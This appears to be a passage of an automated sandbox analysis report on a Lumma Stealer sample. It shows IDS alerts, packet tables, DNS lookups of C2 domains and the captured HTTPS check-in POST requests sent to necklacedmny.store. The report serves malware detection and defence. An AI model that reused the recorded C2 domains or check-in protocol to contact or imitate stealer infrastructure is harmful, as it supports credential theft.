                                                                                  2024-10-31T10:15:02.827175+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.6646841.1.1.153UDP
                                                                                  2024-10-31T10:15:02.840866+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.6626611.1.1.153UDP
                                                                                  2024-10-31T10:15:02.862663+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.6498911.1.1.153UDP
                                                                                  2024-10-31T10:15:02.872774+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.6497871.1.1.153UDP
                                                                                  2024-10-31T10:15:02.883258+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.6553841.1.1.153UDP
                                                                                  2024-10-31T10:15:03.526967+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649709188.114.97.3443TCP
                                                                                  2024-10-31T10:15:04.044644+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649709188.114.97.3443TCP
                                                                                  2024-10-31T10:15:04.044644+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649709188.114.97.3443TCP
                                                                                  2024-10-31T10:15:04.706146+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649710188.114.97.3443TCP
                                                                                  2024-10-31T10:15:05.153325+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649710188.114.97.3443TCP
                                                                                  2024-10-31T10:15:05.153325+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649710188.114.97.3443TCP
                                                                                  2024-10-31T10:15:05.986585+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649711188.114.97.3443TCP
                                                                                  2024-10-31T10:15:07.254126+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649713188.114.97.3443TCP
                                                                                  2024-10-31T10:15:08.646851+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649714188.114.97.3443TCP
                                                                                  2024-10-31T10:15:10.383887+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649715188.114.97.3443TCP
                                                                                  2024-10-31T10:15:10.869280+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649715188.114.97.3443TCP
                                                                                  2024-10-31T10:15:12.728986+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649717188.114.97.3443TCP
                                                                                  2024-10-31T10:15:14.789864+01002057124ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI)1192.168.2.649728188.114.97.3443TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 31, 2024 10:15:02.901139975 CET49709443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:02.901197910 CET44349709188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:02.901407003 CET49709443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:02.903736115 CET49709443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:02.903748989 CET44349709188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:03.526838064 CET44349709188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:03.526967049 CET49709443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:03.532946110 CET49709443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:03.532994032 CET44349709188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:03.533224106 CET44349709188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:03.586447001 CET49709443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:03.590764046 CET49709443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:03.590787888 CET49709443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:03.590833902 CET44349709188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:04.044661045 CET44349709188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:04.044748068 CET44349709188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:04.044914961 CET49709443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:04.046335936 CET49709443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:04.046350956 CET44349709188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:04.046361923 CET49709443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:04.046366930 CET44349709188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:04.108369112 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:04.108421087 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:04.108510971 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:04.108820915 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:04.108834982 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:04.706048965 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:04.706146002 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:04.707190037 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:04.707200050 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:04.707442045 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:04.708607912 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:04.708623886 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:04.708671093 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.153321028 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.153364897 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.153398991 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.153428078 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.153444052 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.153458118 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.153466940 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.153481960 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.153517008 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.153527975 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.153563023 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.153594017 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.153625011 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.153630018 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.153670073 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.268826008 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.268882990 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.268915892 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.268942118 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.268951893 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.268961906 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.269015074 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.269026995 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.269078016 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.269366980 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.269381046 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.269392014 CET49710443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.269396067 CET44349710188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.380439043 CET49711443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.380476952 CET44349711188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.380569935 CET49711443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.380856037 CET49711443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:05.380868912 CET44349711188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.986480951 CET44349711188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:05.986584902 CET49711443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:06.001374960 CET49711443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:06.001389980 CET44349711188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:06.001754999 CET44349711188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:06.003480911 CET49711443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:06.003740072 CET49711443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:06.003772974 CET44349711188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:06.515254974 CET44349711188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:06.515376091 CET44349711188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:06.515450954 CET49711443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:06.515541077 CET49711443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:06.515567064 CET44349711188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:06.638408899 CET49713443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:06.638454914 CET44349713188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:06.638514996 CET49713443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:06.638864040 CET49713443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:06.638881922 CET44349713188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:07.253954887 CET44349713188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:07.254126072 CET49713443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:07.255497932 CET49713443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:07.255520105 CET44349713188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:07.255831003 CET44349713188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:07.257129908 CET49713443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:07.257282019 CET49713443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:07.257317066 CET44349713188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:07.257421017 CET49713443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:07.257426977 CET44349713188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:07.843740940 CET44349713188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:07.843862057 CET44349713188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:07.843926907 CET49713443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:07.844036102 CET49713443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:07.844067097 CET44349713188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:08.009110928 CET49714443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:08.009143114 CET44349714188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:08.009216070 CET49714443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:08.009507895 CET49714443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:08.009521008 CET44349714188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:08.646770954 CET44349714188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:08.646851063 CET49714443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:08.663959026 CET49714443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:08.663978100 CET44349714188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:08.664597988 CET44349714188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:08.672337055 CET49714443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:08.675448895 CET49714443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:08.675517082 CET44349714188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:08.675616026 CET49714443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:08.675626993 CET44349714188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:09.304825068 CET44349714188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:09.304919004 CET44349714188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:09.305008888 CET49714443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:09.305124998 CET49714443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:09.305141926 CET44349714188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:09.764462948 CET49715443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:09.764512062 CET44349715188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:09.764600039 CET49715443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:09.765033007 CET49715443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:09.765048027 CET44349715188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:10.383781910 CET44349715188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:10.383887053 CET49715443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:10.385538101 CET49715443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:10.385570049 CET44349715188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:10.385809898 CET44349715188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:10.387563944 CET49715443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:10.387685061 CET49715443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:10.387696981 CET44349715188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:10.869287968 CET44349715188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:10.869386911 CET44349715188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:10.869440079 CET49715443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:10.869533062 CET49715443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:10.869550943 CET44349715188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.120163918 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.120220900 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.120291948 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.120573044 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.120587111 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.728883982 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.728986025 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.730272055 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.730281115 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.730519056 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.731759071 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.732511044 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.732542992 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.732687950 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.732719898 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.732841969 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.732868910 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.733014107 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.733047009 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.733207941 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.733241081 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.733434916 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.733467102 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.733481884 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.733494043 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.733642101 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.733669996 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.733697891 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.733865023 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.733901024 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.742595911 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.742759943 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.742784023 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:12.742820024 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.742877960 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:12.748091936 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:14.450412989 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:14.450521946 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:14.450614929 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:14.450726986 CET49717443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:14.450746059 CET44349717188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:14.489818096 CET49728443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:14.489902020 CET44349728188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:14.489986897 CET49728443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:14.490271091 CET49728443192.168.2.6188.114.97.3
                                                                                  Oct 31, 2024 10:15:14.490314960 CET44349728188.114.97.3192.168.2.6
                                                                                  Oct 31, 2024 10:15:14.789864063 CET49728443192.168.2.6188.114.97.3

                                                                                  UDP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Oct 31, 2024 10:15:02.827174902 CET6468453192.168.2.61.1.1.1
                                                                                  Oct 31, 2024 10:15:02.836891890 CET53646841.1.1.1192.168.2.6
                                                                                  Oct 31, 2024 10:15:02.840866089 CET6266153192.168.2.61.1.1.1
                                                                                  Oct 31, 2024 10:15:02.861149073 CET53626611.1.1.1192.168.2.6
                                                                                  Oct 31, 2024 10:15:02.862663031 CET4989153192.168.2.61.1.1.1
                                                                                  Oct 31, 2024 10:15:02.871536016 CET53498911.1.1.1192.168.2.6
                                                                                  Oct 31, 2024 10:15:02.872773886 CET4978753192.168.2.61.1.1.1
                                                                                  Oct 31, 2024 10:15:02.882293940 CET53497871.1.1.1192.168.2.6
                                                                                  Oct 31, 2024 10:15:02.883258104 CET5538453192.168.2.61.1.1.1
                                                                                  Oct 31, 2024 10:15:02.896497011 CET53553841.1.1.1192.168.2.6

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Oct 31, 2024 10:15:02.827174902 CET192.168.2.61.1.1.10xe7a7Standard query (0)presticitpo.storeA (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:15:02.840866089 CET192.168.2.61.1.1.10xaaabStandard query (0)crisiwarny.storeA (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:15:02.862663031 CET192.168.2.61.1.1.10xb81dStandard query (0)fadehairucw.storeA (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:15:02.872773886 CET192.168.2.61.1.1.10x9ccfStandard query (0)thumbystriw.storeA (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:15:02.883258104 CET192.168.2.61.1.1.10x3eceStandard query (0)necklacedmny.storeA (IP address)IN (0x0001)false

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Oct 31, 2024 10:15:02.836891890 CET1.1.1.1192.168.2.60xe7a7Name error (3)presticitpo.storenonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:15:02.861149073 CET1.1.1.1192.168.2.60xaaabName error (3)crisiwarny.storenonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:15:02.871536016 CET1.1.1.1192.168.2.60xb81dName error (3)fadehairucw.storenonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:15:02.882293940 CET1.1.1.1192.168.2.60x9ccfName error (3)thumbystriw.storenonenoneA (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:15:02.896497011 CET1.1.1.1192.168.2.60x3eceNo error (0)necklacedmny.store188.114.97.3A (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:15:02.896497011 CET1.1.1.1192.168.2.60x3eceNo error (0)necklacedmny.store188.114.96.3A (IP address)IN (0x0001)false
                                                                                  Oct 31, 2024 10:15:19.306351900 CET1.1.1.1192.168.2.60x198cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                  Oct 31, 2024 10:15:19.306351900 CET1.1.1.1192.168.2.60x198cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                                                                  HTTP Request Dependency Graph

                                                                                  • necklacedmny.store

                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.649709188.114.97.34433084C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-31 09:15:03 UTC265OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 8
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-31 09:15:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                  Data Ascii: act=life
                                                                                  2024-10-31 09:15:04 UTC1017INHTTP/1.1 200 OK
                                                                                  Date: Thu, 31 Oct 2024 09:15:03 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=t2uv2lphk3qvuk96ktefn5kqnl; expires=Mon, 24-Feb-2025 03:01:42 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Z%2FxGLqIFZe%2BvrwSWUk9Eew5n3DSd6JbA8QdAZs0%2BbHD7OJE1F%2BnFsxlAkN7RZHU46iksWwi1YYNVKLTx9qu9CkZPpwggFSSHecwh3FgOtpSHJqA4Pb4B3GnSqpWDKR%2Fi5kppzY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8db289d3df9ae847-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1190&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1920424&cwnd=251&unsent_bytes=0&cid=8c2aae13690984d5&ts=530&x=0"
                                                                                  2024-10-31 09:15:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                  Data Ascii: 2ok
                                                                                  2024-10-31 09:15:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.649710188.114.97.34433084C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-10-31 09:15:04 UTC266OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 52
                                                                                  Host: necklacedmny.store
                                                                                  2024-10-31 09:15:04 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                  Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                  2024-10-31 09:15:05 UTC1011INHTTP/1.1 200 OK
                                                                                  Date: Thu, 31 Oct 2024 09:15:05 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=8urui9sn2c08shqlm5mc8h4n4f; expires=Mon, 24-Feb-2025 03:01:44 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  cf-cache-status: DYNAMIC
                                                                                  vary: accept-encoding
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gkuNe1w3iophyGFd6b4Eo9F2Aa3jdTBsFfLm%2BWXnlWxzkUB%2FEtIa3EnJ87OKv3K6DcL6VqSJ6sNprPKW2BMN12qI7WllO5iveIlEy3dCVw6G8ghrqvyeq23rWbdnycRYpp2LcGY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8db289dadc3d2ff4-DFW
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1275&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=954&delivery_rate=2193939&cwnd=242&unsent_bytes=0&cid=29d6558ad60fb583&ts=452&x=0"
